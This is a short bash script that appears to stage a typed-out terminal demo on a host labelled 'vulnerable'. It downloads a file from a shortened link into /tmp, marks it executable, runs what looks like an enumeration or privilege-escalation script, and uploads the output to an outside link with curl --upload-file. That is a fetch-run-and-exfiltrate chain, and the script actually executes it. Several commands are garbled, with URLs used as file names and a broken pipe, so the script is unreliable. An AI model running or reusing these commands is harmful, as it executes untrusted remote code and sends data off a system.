#!/bin/bash

echo -n "vulnerable:2> "
sleep 1
echo "cd /tmp" | pv -qL 10 
cd /tmp
echo -n "vulnerable:2> "
sleep 1
echo "curl https://t.co/RFg81fNmSc --output https://t.co/iShn10uWK1" | pv -qL 10 
curl https://t.co/RFg81fNmSc --output https://t.co/iShn10uWK1
echo -n "vulnerable:2> "
sleep 1
echo "pwd" | pv -qL 10 
pwd
echo -n "vulnerable:2> "
sleep 1
echo "ls -la" | pv -qL 10 
ls -la
echo -n "vulnerable:2> "
sleep 1
echo "chmod +x https://t.co/iShn10uWK1" | pv -qL 10 
chmod +x https://t.co/iShn10uWK1
echo -n "vulnerable:2> "
sleep 1
echo "ls -la" | pv -qL 10 
ls -la
echo -n "vulnerable:2> "
sleep 1
echo "./lp.sh | lp.out" | pv -qL 10 
./lp.sh | lp.out
echo -n "vulnerable:2> "
sleep 1
echo "curl --upload-file ./sh.out https://t.co/ImcsDgn4UH -la" | pv -qL 10 
curl --upload-file ./sh.out https://t.co/ImcsDgn4UH -la
exit
